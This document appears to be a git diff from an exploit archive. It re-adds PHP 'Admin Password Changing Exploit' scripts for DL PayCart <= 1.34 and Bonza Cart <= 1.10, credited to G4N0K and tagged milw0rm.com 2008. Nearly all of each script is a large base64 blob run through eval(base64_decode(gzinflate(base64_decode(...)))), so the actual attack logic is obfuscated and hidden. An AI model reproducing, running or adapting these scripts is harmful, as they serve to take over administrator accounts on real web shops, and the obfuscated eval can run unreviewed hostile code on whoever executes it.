-                 "I0uHiKFTTVxkO8XJQxdsscK9784K0LlBoqpj16gDeZXYDPi1F5yoKvOIsUqUdYlTOX0AsvrbLjE9".
-                 "tQZ/N2iVlpESlOCznIzHwzr6EsDvQd4YYlJmvmv8DFi1xXCO5oKtZb5fZ8bSpMij38t6Cb26XOdp".
-                 "h5ewdk/BeupladZV6DpNoBglVsY9I1YtAg89xQzfhK6Z6J7AIdFYAaIApTbsWfMP60ShCVxcRpWZ".
-                 "vHbUi+gGLfE3Zpw6YFJqDXaLZJPIMp5bBXXgngviZ6Q4jSYKD3uF3qMc+rJJIlfqiR/X+eIZKUIa".
-                 "yFYdVfH4m1xeiH5YKZtgV58iZlauQY43k3oJqrKMZAtsZpJ5gz185lz6sK9f8VS4HM6CMw1K80b/".
-                 "r6sZxIg9zI1lqQhkwM/lcNYVgbvu+0H/OtoL9GS/CnyQ4mUNNgmov5dDykD/YX/MlAWWkyd9Z3ax".
-                 "kkz+Ore+Zz5FslPhUT4q8FJKcyXwBz6t9+poV2Jr72aLY1yV+1Axn3T2XU6IcwYpxwecrPf4EHpW".
-                 "uQa8xhWuo7xOsWe1a0aFOLfKOD/kRu4z5EFLqXsVhUvEnOtgeWQB12CzA6svhe51eeRJDtDY0W5D".
-                 "DEEsB65UDJ9lEi/FkCfAhgySjYbE5marFjhD7+NT3MH4o56VUZLcEedNtsnPXVzZZA2/2VF/4jHE".
-                 "bJEg8atHeLt+9vrPY8MjzR/G3+d9eBbUy9fnLBKtF+LhM+Stt2nsTRTmd3NaJHXv43fzPj5gv290".
-                 "moOM41nv+4/73cnyNp5Fxs9vH+S4f76zH8jLv41njft49HzUbxifZKH58SxyvjT+/p39tjaXOKtU".
-                 "QquZsLPtZEf5iUbP28H2Eh+P58D+7HQOfAY7tV5P/CTEHj2MT3r9G/v91ucX+PuND9jvD8UU/yv7".
-                 "Df7pp9i5xs/wnmLrhg/yXXj7MqZ+ab8RX2O8nCeMw2epu2K/Jed6Uyxo/aL9zn7f5In5PX7fBoxP".
-                 "WJbOU6wK728xhhj7Wu5v7adc8Tvie7AnO+7r3XLDFLMwR8umvPJP7LdyuFg+tyHUL3NfENmv8TPo".
-                 "SM65vj0iwxBP/BvRhcg0xJ/47/Lf73z+aP34DVz1j8qbd22sqOUG3qQukxq+lSxjRzhIZsk7WjU2".
-                 "26G/ka3CJ5y/AI6f+C5wA4bj0bVeX2t7xffRVph4GXD9iesYO3vgOigTUh/4d0TW7pvCow3JLgN4".
-                 "mr29Sk3yfbfy955HZUimgQenbQA9QyzzwPfIGTXYzzog6CHW0CfEjNGHnkBphBftzu/8jPQnSTEH".
-                 "PrUPgP8Al8g2WXDy90a3puwE+E2H5C6JeqFGillFlXqJl9AbMOgH8Jkrt/0BfKaHvEF0UzfAW2Gf".
-                 "Jtxx85HPdQnRFzgMDTzszaJmGspnKAJutAZ7TnPGtcAnY4Vw3xvvuXHdB74lLgYWtmZxHSjWYZ2v".
-                 "2IGD9igBXg42c/rQ4ZVd0YB9Zmnk2o9jj30MfA/SSHHgPJRtBpmKSZ5zTXTxXbWEPrCKWARrhDbe".
-                 "W5Me3GSTowly/kZ9zCsO6smvPZY+6nMnRyZQr55w44nwnQHs0QRb6+Xin+iUAoY+6UQw9Pt0ij/o".
-                 "JFHhZ53e5fhGJ60f8QcYm/BbAAbPqV85DZKDNs6pLNrjDjOf/LQOvPhoy9IlZjFwevOJ7DPYYoqF".
-                 "0J11GHJ5zFqziGCkunH/sd9TSC9ZFtD3gX768y12L4T3E13KAmQ+YVZgg4/6VTM2VnDhUXi9Baxi".
-                 "0vfvrr0+fK+kBpN52aAfDTJBrA3+yuKp3xd3kIPee6Zb7D3E4NVHoyz7iP4oB24/yhCzTha55YOd".
-                 "TdcY7ljQFv3dvn3gQQ755EO1JP3rp/0rh8h7F2vqdlgP+epOdtAX/FdRRH+SQ4cxf48S7cJd30M+".
-                 "vuZhC7pQ0tOFrp+8QL9Lzn4RrTd7xe8cqdkHDD9gQKWpGol+hT7PybCn1qO8Kn7ZLio1W6SBS3dY".
-                 "KQ6qxJs72rDd/i5/lV/vdY9rb1skauYnyHWOMeScb+ZBfh1qSRezUA+3i2xXOazpWsfQ5Xh/fFdk".
-                 "bMDuZQUY4aAuCBubtqJHXKlYy9DdXPTLuWQ/xxMKiPdS3aHOBp0w6e1ZPSO2VWUDetdZHsr8TwS1".
-                 "GmKjh5pxAn2IvPU4p25Dxh5kH3QUF5mWfaUvl006tfH7WadYTrsNc27BZzQWBeRIlqldVifdOfee".
-                 "zGX352g5laAibeH8JySi0xd+OqHyi7UlwSM6mqSG7WGPFd2+VmUTyavW2HIdElMPckERsfiy7gUH".
-                 "ntt36KNstLRP+q5JApc7Oo7+jBSVgTp0WoPPLcbJQ2be6vmig/xL63nRGZkgh55aQi3ktIt+0qWv".
-                 "dDqWgbcAuc41rmzIqXr39VzIRdWsnLjCE5LHtf6w1onj8nxC+YCr/0TMsUQi8AlRXUbMjAJ/Upoz".
-                 "1EFYJ3XAYWufkYZ419jkiFnMau4Qi0eIj4b4n9zJBd/JMt1n7gAbAQs5PxswALhxTj6TtmHPZZ6i".
-                 "xtEXPlEV4ETiNCdDz4+c3oJ8ow/4GnV6564qYAvLUh72Cx7yP9Qf42fECmWUJe+4v6v/3ra7G7+r".
-                 "oyXVqLLTx9Ws1cQF1DS1J1iHz7QuFo/yyGX1Iq5IzFDkDunFaz73IDLgQJ4f0DV/E361xwcf6osP".
-                 "WEBKmSLZagFXey3jIM8uphw322GXpkJ54Lws8RVScA9+u80bONiH3H/NmSgrnj/3DgLYz4LY4J4/".
-                 "yal8vtMJhjv7JNvIVo2zK1elY1QNd5hPEeGwrtSgZdpBrIIN0jZyV8+3e8GeHu/58pHTepDn3f6I".
-                 "0RJs8I7bMhC5kzbYZ5A/25TNT4/YIZ/tCCcltoHYKmPPKSHWT6A/sVFLOI2fc9nLrvks+x735B4P".
-                 "8lOKFSv1maaZcDbkqg92YcHOTbBN0qBy2gAwc/Pptnz+qq9UiUw9xwcVLrGiH94xCLb/u370g42D".
-                 "ymiAA9/LWK/7YZ0qbkd8QQ4Cu6s1weDLiH9yX37BrpFD7bwEe6eJlCKb5FRFsyxJnMGc6IWmwIZc".
-                 "YnlpF8l8DRwDOMsqGWx8xePN1tx8vAsXIMbPwJ/Az1DHA6kDvAppzBos4XgI6oAP/gjc0Q9TH1CR".
-                 "fPJ5zxnhWkn8zrWSEOJ3ygm3uvDA00i+Hv2aXDFNMLOR0Q/IUQXwkxO5446A561v81ZJCL4IiMzV".
-                 "8B/Lk9bPH864r+//pCYRrE7/1/zfe4F90s1d/P+P7wvse7pxbafLBj8t6xP4A/J8l6wVAXKDlUJt".
-                 "Pvq74+S/Q07+51jT4L/i8X5i+n9n9B9rdL7LfZ1Hhv9SCnW499xCPoWeEXjKlBsW2c03Kx76Yz2B".
-                 "PAncQJ0hsUsgzukN5FHAlIvd8wlyKfBz0AF47SZbnKAWJRrwrAc83t4Tv4MaQO7q72K1Au54CcUE".
-                 "YkWAXO80MdSO116YcD/24muW/Ifz11//BQ==";
-                 eval(base64_decode(gzinflate(base64_decode($G4N0K))));
-
-?>
-
-# milw0rm.com [2008-12-07]
+<?php
+/*
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\
+
+==============================================================================
+	DL PayCart <= 1.34 Admin Password Changing Exploit
+==============================================================================
+
+	[»] Script:             [ DL PayCart ]
+	[»] Language:           [ PHP ]
+	[»] homepage:           [ http://www.dinkumsoft.net/ ]
+	[»] Type:               [ Commercial ]
+	[»] found-report:       [ 26.11.2008-02.12.2008 ]
+	[»] Founder.coder:      [ G4N0K <mail.ganok[at]gmail.com> ]
+
+===[ LIVE ]===
+
+	[»] removed...
+
+
+	
+===[ Greetz ]===
+
+	[»] ALLAH
+	[»] Tornado2800 <Tornado2800[at]gmail.com>
+	[»] B13
+	[»] AFSHIN-ZARBAT <afshin.zarbat[at]yahoo.com>
+	[»] QU1E <evilinhell87[at]yahoo.com>
+	[»] Hussain-X <darkangel_g85[at]yahoo.com>
+
+	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+	//ALLAH,forgimme...
+*/
+
+error_reporting(E_ALL);
+	$G4N0K = "vVlJm6LKEv1BvWGyShZ3ISiQFKCgjDsgq5iV1yiIv/5FAlpadav6vvv66wUfmuYQw4mIE2ngGoeo".
+                 "X8w3yzNyVrS+NA9zZFsbk7YCe2UnoWIdI1EwHVvVt7aeoIxqNTq+mP28tSRrhaR0WIeWq5MuCnZc".
+                 "SaeYKanQ5U++27Ua5axRtshgHypeHlqNxSzuZ6zez9q4iltHQu2rnFKR2501yrItkeeGM5erI1bU".
+                 "NNobNZbLNqqkRqssKhDRDyLjJBcXuedTfKG+3F/fFbP1dtrzulZ20mDJGWJ+PgaelSI4HysL+CzR".
+                 "oefzqDDaaG+V0d48OkrZBVuU+Ax/wrJzwksqgzeHRf6AZbpZ90IeylIfMw61cRzbyigO9G03CfWy".
+                 "USyQ/VxuCktHkpC+2kYa781ks6QSfctdDFEQApmuo0wwfc+4YIbvA1FYwn6ngClPQS9Ir4rQRGBP".
+                 "pHSJdbHW+qqZa+y073CGQb265xIp1iyWbR6B3K+K2fqscUE56FipbaCUz6C3GlSgg0hXvgtnKsWT".
+                 "I0uHiKFTTVxkO8XJQxdsscK9784K0LlBoqpj16gDeZXYDPi1F5yoKvOIsUqUdYlTOX0AsvrbLjE9".
+                 "tQZ/N2iVlpESlOCznIzHwzr6EsDvQd4YYlJmvmv8DFi1xXCO5oKtZb5fZ8bSpMij38t6Cb26XOdp".
+                 "h5ewdk/BeupladZV6DpNoBglVsY9I1YtAg89xQzfhK6Z6J7AIdFYAaIApTbsWfMP60ShCVxcRpWZ".
+                 "vHbUi+gGLfE3Zpw6YFJqDXaLZJPIMp5bBXXgngviZ6Q4jSYKD3uF3qMc+rJJIlfqiR/X+eIZKUIa".
+                 "yFYdVfH4m1xeiH5YKZtgV58iZlauQY43k3oJqrKMZAtsZpJ5gz185lz6sK9f8VS4HM6CMw1K80b/".
+                 "r6sZxIg9zI1lqQhkwM/lcNYVgbvu+0H/OtoL9GS/CnyQ4mUNNgmov5dDykD/YX/MlAWWkyd9Z3ax".
+                 "kkz+Ore+Zz5FslPhUT4q8FJKcyXwBz6t9+poV2Jr72aLY1yV+1Axn3T2XU6IcwYpxwecrPf4EHpW".
+                 "uQa8xhWuo7xOsWe1a0aFOLfKOD/kRu4z5EFLqXsVhUvEnOtgeWQB12CzA6svhe51eeRJDtDY0W5D".
+                 "DEEsB65UDJ9lEi/FkCfAhgySjYbE5marFjhD7+NT3MH4o56VUZLcEedNtsnPXVzZZA2/2VF/4jHE".
+                 "bJEg8atHeLt+9vrPY8MjzR/G3+d9eBbUy9fnLBKtF+LhM+Stt2nsTRTmd3NaJHXv43fzPj5gv290".
+                 "moOM41nv+4/73cnyNp5Fxs9vH+S4f76zH8jLv41njft49HzUbxifZKH58SxyvjT+/p39tjaXOKtU".
+                 "QquZsLPtZEf5iUbP28H2Eh+P58D+7HQOfAY7tV5P/CTEHj2MT3r9G/v91ucX+PuND9jvD8UU/yv7".
+                 "Df7pp9i5xs/wnmLrhg/yXXj7MqZ+ab8RX2O8nCeMw2epu2K/Jed6Uyxo/aL9zn7f5In5PX7fBoxP".
+                 "WJbOU6wK728xhhj7Wu5v7adc8Tvie7AnO+7r3XLDFLMwR8umvPJP7LdyuFg+tyHUL3NfENmv8TPo".
+                 "SM65vj0iwxBP/BvRhcg0xJ/47/Lf73z+aP34DVz1j8qbd22sqOUG3qQukxq+lSxjRzhIZsk7WjU2".
+                 "26G/ka3CJ5y/AI6f+C5wA4bj0bVeX2t7xffRVph4GXD9iesYO3vgOigTUh/4d0TW7pvCow3JLgN4".
+                 "mr29Sk3yfbfy955HZUimgQenbQA9QyzzwPfIGTXYzzog6CHW0CfEjNGHnkBphBftzu/8jPQnSTEH".
+                 "PrUPgP8Al8g2WXDy90a3puwE+E2H5C6JeqFGillFlXqJl9AbMOgH8Jkrt/0BfKaHvEF0UzfAW2Gf".
+                 "Jtxx85HPdQnRFzgMDTzszaJmGspnKAJutAZ7TnPGtcAnY4Vw3xvvuXHdB74lLgYWtmZxHSjWYZ2v".
+                 "2IGD9igBXg42c/rQ4ZVd0YB9Zmnk2o9jj30MfA/SSHHgPJRtBpmKSZ5zTXTxXbWEPrCKWARrhDbe".
+                 "W5Me3GSTowly/kZ9zCsO6smvPZY+6nMnRyZQr55w44nwnQHs0QRb6+Xin+iUAoY+6UQw9Pt0ij/o".
+                 "JFHhZ53e5fhGJ60f8QcYm/BbAAbPqV85DZKDNs6pLNrjDjOf/LQOvPhoy9IlZjFwevOJ7DPYYoqF".
+                 "0J11GHJ5zFqziGCkunH/sd9TSC9ZFtD3gX768y12L4T3E13KAmQ+YVZgg4/6VTM2VnDhUXi9Baxi".
+                 "0vfvrr0+fK+kBpN52aAfDTJBrA3+yuKp3xd3kIPee6Zb7D3E4NVHoyz7iP4oB24/yhCzTha55YOd".
+                 "TdcY7ljQFv3dvn3gQQ755EO1JP3rp/0rh8h7F2vqdlgP+epOdtAX/FdRRH+SQ4cxf48S7cJd30M+".
+                 "vuZhC7pQ0tOFrp+8QL9Lzn4RrTd7xe8cqdkHDD9gQKWpGol+hT7PybCn1qO8Kn7ZLio1W6SBS3dY".
+                 "KQ6qxJs72rDd/i5/lV/vdY9rb1skauYnyHWOMeScb+ZBfh1qSRezUA+3i2xXOazpWsfQ5Xh/fFdk".
+                 "bMDuZQUY4aAuCBubtqJHXKlYy9DdXPTLuWQ/xxMKiPdS3aHOBp0w6e1ZPSO2VWUDetdZHsr8TwS1".
+                 "GmKjh5pxAn2IvPU4p25Dxh5kH3QUF5mWfaUvl006tfH7WadYTrsNc27BZzQWBeRIlqldVifdOfee".
+                 "zGX352g5laAibeH8JySi0xd+OqHyi7UlwSM6mqSG7WGPFd2+VmUTyavW2HIdElMPckERsfiy7gUH".
+                 "ntt36KNstLRP+q5JApc7Oo7+jBSVgTp0WoPPLcbJQ2be6vmig/xL63nRGZkgh55aQi3ktIt+0qWv".
+                 "dDqWgbcAuc41rmzIqXr39VzIRdWsnLjCE5LHtf6w1onj8nxC+YCr/0TMsUQi8AlRXUbMjAJ/Upoz".
+                 "1EFYJ3XAYWufkYZ419jkiFnMau4Qi0eIj4b4n9zJBd/JMt1n7gAbAQs5PxswALhxTj6TtmHPZZ6i".
+                 "xtEXPlEV4ETiNCdDz4+c3oJ8ow/4GnV6564qYAvLUh72Cx7yP9Qf42fECmWUJe+4v6v/3ra7G7+r".
+                 "oyXVqLLTx9Ws1cQF1DS1J1iHz7QuFo/yyGX1Iq5IzFDkDunFaz73IDLgQJ4f0DV/E361xwcf6osP".
+                 "WEBKmSLZagFXey3jIM8uphw322GXpkJ54Lws8RVScA9+u80bONiH3H/NmSgrnj/3DgLYz4LY4J4/".
+                 "yal8vtMJhjv7JNvIVo2zK1elY1QNd5hPEeGwrtSgZdpBrIIN0jZyV8+3e8GeHu/58pHTepDn3f6I".
+                 "0RJs8I7bMhC5kzbYZ5A/25TNT4/YIZ/tCCcltoHYKmPPKSHWT6A/sVFLOI2fc9nLrvks+x735B4P".
+                 "8lOKFSv1maaZcDbkqg92YcHOTbBN0qBy2gAwc/Pptnz+qq9UiUw9xwcVLrGiH94xCLb/u370g42D".
+                 "ymiAA9/LWK/7YZ0qbkd8QQ4Cu6s1weDLiH9yX37BrpFD7bwEe6eJlCKb5FRFsyxJnMGc6IWmwIZc".
+                 "YnlpF8l8DRwDOMsqGWx8xePN1tx8vAsXIMbPwJ/Az1DHA6kDvAppzBos4XgI6oAP/gjc0Q9TH1CR".
+                 "fPJ5zxnhWkn8zrWSEOJ3ygm3uvDA00i+Hv2aXDFNMLOR0Q/IUQXwkxO5446A561v81ZJCL4IiMzV".
+                 "8B/Lk9bPH864r+//pCYRrE7/1/zfe4F90s1d/P+P7wvse7pxbafLBj8t6xP4A/J8l6wVAXKDlUJt".
+                 "Pvq74+S/Q07+51jT4L/i8X5i+n9n9B9rdL7LfZ1Hhv9SCnW499xCPoWeEXjKlBsW2c03Kx76Yz2B".
+                 "PAncQJ0hsUsgzukN5FHAlIvd8wlyKfBz0AF47SZbnKAWJRrwrAc83t4Tv4MaQO7q72K1Au54CcUE".
+                 "YkWAXO80MdSO116YcD/24muW/Ifz11//BQ==";
+                 eval(base64_decode(gzinflate(base64_decode($G4N0K))));
+
+?>
+
+# milw0rm.com [2008-12-07]
diff --git a/platforms/php/webapps/7366.php b/platforms/php/webapps/7366.php
index 1c54268a5..ec560ab90 100755
--- a/platforms/php/webapps/7366.php
+++ b/platforms/php/webapps/7366.php
@@ -1,105 +1,105 @@
-<?php
-/*
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\
-
-==============================================================================
-	Bonza Cart <= 1.10 Admin Password Changing Exploit
-==============================================================================
-
-	[»] Script:             [ Bonza Cart ]
-	[»] Language:           [ PHP ]
-	[»] homepage:           [ http://www.dinkumsoft.net/ ]
-	[»] Type:               [ Commercial ]
-	[»] found-report:       [ 26.11.2008-02.12.2008 ]
-	[»] Founder.coder:      [ G4N0K <mail.ganok[at]gmail.com> ]
-
-===[ LIVE ]===
-
-	[»] removed...
-
-
-	
-===[ Greetz ]===
-
-	[»] ALLAH
-	[»] Tornado2800 <Tornado2800[at]gmail.com>
-	[»] B13
-	[»] AFSHIN-ZARBAT <afshin.zarbat[at]yahoo.com>
-	[»] QU1E <evilinhell87[at]yahoo.com>
-	[»] Hussain-X <darkangel_g85[at]yahoo.com>
-
-	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-	//ALLAH,forgimme...
-*/
-
-error_reporting(E_ALL);
-	$G4N0K = "vVlZd6rKEv5B+4VBE3kUFGiCKChTv0mTMCt3owz++lsNGDU5yT7rrKz9wEKaprrqq6G/arFrHINu".
-                 "PtssWuQs2dXCPM6QbW1M1sL20o72qnUKJNF0bG21tVcRSphaZ8nF7Ga1JVtLJMf9d2ixPK8k0SaF".
-                 "fCZczuxd4ey7Ta0zzhol8wTkMGRxrHU+5MNuyq+6aU0KUjsyql+VmAncptUZy7YkYdKvuVieQlWL".
-                 "g4NRhkpeB4Vc6YXFYAn9ojqOek0Ctz2TC/Ol/NUum663o8zrt4oT48XEkNL2hD0rRrB+qM7ht8zu".
-                 "PV9AmVEHBysPDubJUfMGb1Hkc8I5VJxzuGASuE9CSTiGClutOzHdK3JHOIfZOI5tJcwE7K03EfOy".
-                 "US3Qvc03mQbyyhgtjZgczGizYKLVdtICXiJW2DJIRNP3jEvICR2WxAXIO2MuP+NOlF9VsQoAT6Q2".
-                 "kXWx1qtlNdP5UW6/hsG8um2OVGtKFFtAoPeratY+b1xQCjYWWo3V/Bns1nABNkhs4buwppo9OYp8".
-                 "DDg21qV5slOddO8CFsuw891pBjZXSNJWoWuUWFlGNgd+7UQnKPI04KwcJU3kFE6HQVd/20Smp5Xg".
-                 "7wot4zxQcQ4+S+k46b9jLxje47QypChPfNf4jXmtDmEd3QWsFaFbJ8bCZOi1utf1svfKfJ3GTbiA".
-                 "bw8MfM+8LMyy2LtOhVUjD9VBZsBrGfbQE+GEau+a0coTJ0gylhBREKU2yCyFh+8kscJumAeFGb02".
-                 "zIvk4pr6O+ScEnMxswbcAsWkugzrFrjEbptRPyPVqXRJfJC19x71WC2qKHDljvpxnc6fkSrGWLHK".
-                 "oCDDOyW/UPtCNa/wrjwH3DRfgx5vJvOCizwPFAswM+m8Hg+fa3Mf5PqFwOwX/VqwpsHo3uD/dTGF".
-                 "HLH7uUSRM6xA/FyO7UoVJ1e5H+wvg4PIjvgV4IM4XJSACWb+WQ85Aft7+SGXZ6ESPa12ZkPUaPRX".
-                 "W/ue+RQoThEO+jHYixndlcEf4Xl90AZcKdbeOxYnUuSHvWo+rfibnpDnHFJPD3GyPoTHvWfla4hX".
-                 "UoRlkJZx6Fn1mtMgz62cpMfUSH2OXmghN6+SeAm4tsSLEw9xDZgd+dVCbF4XJ4HWAJ0fcOtzCHIZ".
-                 "u3LW/1ZovmR9nQAMOaQYFc3NzVbLwgTdxse8g/FHOwsjp7WDpFWySduGFDb9RtjsmL9xGVIyj5D0".
-                 "1SW+XX973eex/pJnD+O3eR+uOfPy9TrzSO9E0v+GuvU2jr1J4uxuTo3k5jZ+N+/jBfh9Y9MMdBzW".
-                 "uskf5N3p8jasRcfbtw963F/f4Qf6Cm/DWoMcj50N9vXjoy6sMKxF15eH99/ht7UnkbOMZbScijvb".
-                 "jnaMH+nsrO6xlwUyrAPy+XEd+A041V5H/SQSj+3HR7v+C34/ev0h/n7wAvz+Uk4Jf8Kv90835s41".
-                 "f/r7mFvv8UGfxbcvc+qP+A3xNeRLO8Y4/Jaba+zXdF1vzAW9m9ff4fdNnZjdx+9bH+NjLMvtmKvi".
-                 "7S4RyLGv9f4WP/Uav0N893jyg1zvvTaMOQtz9GSsK/8Gv6UzIUpb72H/Mg8Z1f2aP72NdJ3r3aM6".
-                 "9PkkvFFbqE59/kn/rf795PVX948f4Kp/Vd+0qYmq5Ru4032Z7uFb2TJ2lIMklrJjNWOz7fsbxcp8".
-                 "yvkz4PiR7wI34CYCuu7X1729ELpgK468DLj+yHWMnd1zHZSIsQ/8O6DfHqrMYw3ZzjFc1cFexiZ9".
-                 "3i39g+cxCVJY4MFxjaFnIIoAfI+uUQJ+1hFBD7GGPoFwRrf3REanvGjX3vgZ7U+ibAZ86oCB/wCX".
-                 "SDYJPvsHo1kzdgT8pkFKEwWdWCLVLIJCu5AF9AYc+gV85sptfwGf6aBuUNu0DfBWkFPtd5PZwOea".
-                 "iNoLHIYFHvZmMVMdpVMUADdaA57jnOFb4JNEpdz3nfe8c90HviXNexa25sMSq9ZxnS75noN2KAJe".
-                 "Dpg53d4R1F1WAT7TOHDtx7HHPgaecRyoDqyHkk2vUzbq05bUFt/VcugDi4BH8I1Yk4M12jEZMTmZ".
-                 "oOcP2mNe46Ac/dqF8kd77vRIRObVE995IjxzEHssja31Yv5vbIohhj7ZRGPo52wiH2ySmf1nm256".
-                 "fGOT3g3xBzE2xm8GMdjGfuFUSME1SZkkOIRNyH3y0xp75GQr8oXwIXB684nK6bEYc2HvTpsQajnh".
-                 "rWlAY6R45/5Dv6fSXjLPoO8D+1bP77l7obyf2pJnoPM55EUef7SvmPJEDTOPCddbiNWQ9v27a68P".
-                 "z4VchXRe0tvHgk6Qa72/EjL2+9IOatCtZ3rPvYccvPpo0OUQsB/1COuPOhDeSQI3f8DZdI3+jAVt".
-                 "0T/J7bAHNeSTD7Wc9q+f5BcO1fcu17Rt/z3UqzvdwV7wX8FQ+2kN7cf8A4r0y+R67+vxtQ5b0IXS".
-                 "nm7v+tEL9Lt07RfJerOXws6RqwPmhD4GNJYpkeQX6POcJPS0ctBXC1+280JL5jF22SZUs6MmC+aO".
-                 "NWy3u6tf+dey7uPa22aRlvgRcp0TgZrzzTyor1VGIKcQ7IUoF+NXR4yDBXvy3bzSi7Lec858Xwi/".
-                 "8Xb6vz1nF1tPPO9cIQNsOy1roc89wd44F4wOw/4YnrCnpfsF02rZNA8ZOQPfnjfucO/HWDEm/KqF".
-                 "mne+s/Ehbr3tJLmb2/1x7gHkOU6DwTa8tbuVTM9OaA8eXlBaZT4Xw35hHAOuijb9/qfBHjI5air8".
-                 "lrJnTaF22vBunvQ4SfNET77CbAK9u3Xau5Ma7m/UDyE9j+BXZ6LEzYZra/A9G0oicmTL1C/L88pp".
-                 "O08Z957kUfZ9DOiJRkjenh2IT5KwIubomdwxAryf9i7Uzu2M1dN59CKHYJtVh/zqGck2XO/P0S43".
-                 "IwM4zboT8yBhHftSReTgPwHPmb5sRRW7xu+gm3WrxXyyWtjdejfn0BKXkCdQk6N61U0aT9VIkJ1y".
-                 "7M1PJnCJsLChxq6aldzbsQi46RmPObpOxN/YdZr+jMDD+fDthzPG3THyPbEJ6LmZ1/OL+lVi+ZAn".
-                 "p4GTsBDjLfUR5JeTfZSxUxzAF2r5gF26h2fwab3vJkk/N6d6TZJ1Z/0v4E45koC/SFZDePOMbu+g".
-                 "bqx6H/cx4VkMPYOhcY8PRu1zp5qA3K/yU3/Iodu+6G0b2IO0LihmFayZk4MG8YUqtLCbl92pxEkU".
-                 "axA/oSKn+y5/xv2ZdJTc6if6FXJxDPESkwK4j7uMsCLQ86OznkxitBhrcG6wAeyLsE8ckBpSXKKQ".
-                 "Bz77Pq+p/XTysWZBXbPKMJ0koAvYbwHOk+c31wEMZ0c08sXrnuNJWgG+Zeh5GynYOJDmE6LCOuNZ".
-                 "6pq/nW0NZ2FHtuc/bJNs8uq3B1zUT2/xgV2T6kZ1qSkXgHfBC8tE1GYbYrs/x+vEjp5NY3rel0zO".
-                 "FJdBb/QLJdkzPoQdPRsDv8SQ07HPVdWYryXs8YBHC+/kArtCcTenfPGgrkHt11O2gDxiSBe9+xyw".
-                 "EHBhVJCP93LLNZcXSIppfSgBkw7e0ZihZ8WX0DVS0PGCD04VqFnysr36cp643SmkNt16MisHHvLB".
-                 "JzfbN0p/HkvP3SvKgwD3DrsWAX7a3PUf6dB/OFmPiyT0fKo/O158lrkrHJ6ewxLe4CkvonsEgtqB".
-                 "kgnweHFjs1bwyANovUEDzu8xBj7cUS5O/dz3Q43vToGjHK/z6P8JoKtPdT4Cbs06mdUPa9zxXaiV".
-                 "d+N3HCtnzqgY9gSdxk4i/oysC+C9+5wD//ZOIL7B5rE/Ygkqej89BbRGQX1Di7iBPIUYiuvAXT6P".
-                 "/ntC9Gz/cqL+u/2nsdSmaEmYXSrqo/8usI+c3znV+33kFAl6fttCzYb+CPbk6HNsCdALriIdembC".
-                 "g2wJ+vtFy24gV0EnN3TbM9Qh4KLAjYHDbZL5GepgpAOnGGLnm3VdXIWecXyBvRCpUA/d9oK34jP0".
-                 "cbRORNoSb+yMeabn1/8H";
-                 eval(base64_decode(gzinflate(base64_decode($G4N0K))));
-?>
-
-# milw0rm.com [2008-12-07]
+<?php
+/*
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\
+
+==============================================================================
+	Bonza Cart <= 1.10 Admin Password Changing Exploit
+==============================================================================
+
+	[»] Script:             [ Bonza Cart ]
+	[»] Language:           [ PHP ]
+	[»] homepage:           [ http://www.dinkumsoft.net/ ]
+	[»] Type:               [ Commercial ]
+	[»] found-report:       [ 26.11.2008-02.12.2008 ]
+	[»] Founder.coder:      [ G4N0K <mail.ganok[at]gmail.com> ]
+
+===[ LIVE ]===
+
+	[»] removed...
+
+
+	
+===[ Greetz ]===
+
+	[»] ALLAH
+	[»] Tornado2800 <Tornado2800[at]gmail.com>
+	[»] B13
+	[»] AFSHIN-ZARBAT <afshin.zarbat[at]yahoo.com>
+	[»] QU1E <evilinhell87[at]yahoo.com>
+	[»] Hussain-X <darkangel_g85[at]yahoo.com>
+
+	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+	//ALLAH,forgimme...
+*/
+
+error_reporting(E_ALL);
+	$G4N0K = "vVlZd6rKEv5B+4VBE3kUFGiCKChTv0mTMCt3owz++lsNGDU5yT7rrKz9wEKaprrqq6G/arFrHINu".
+                 "PtssWuQs2dXCPM6QbW1M1sL20o72qnUKJNF0bG21tVcRSphaZ8nF7Ga1JVtLJMf9d2ixPK8k0SaF".
+                 "fCZczuxd4ey7Ta0zzhol8wTkMGRxrHU+5MNuyq+6aU0KUjsyql+VmAncptUZy7YkYdKvuVieQlWL".
+                 "g4NRhkpeB4Vc6YXFYAn9ojqOek0Ctz2TC/Ol/NUum663o8zrt4oT48XEkNL2hD0rRrB+qM7ht8zu".
+                 "PV9AmVEHBysPDubJUfMGb1Hkc8I5VJxzuGASuE9CSTiGClutOzHdK3JHOIfZOI5tJcwE7K03EfOy".
+                 "US3Qvc03mQbyyhgtjZgczGizYKLVdtICXiJW2DJIRNP3jEvICR2WxAXIO2MuP+NOlF9VsQoAT6Q2".
+                 "kXWx1qtlNdP5UW6/hsG8um2OVGtKFFtAoPeratY+b1xQCjYWWo3V/Bns1nABNkhs4buwppo9OYp8".
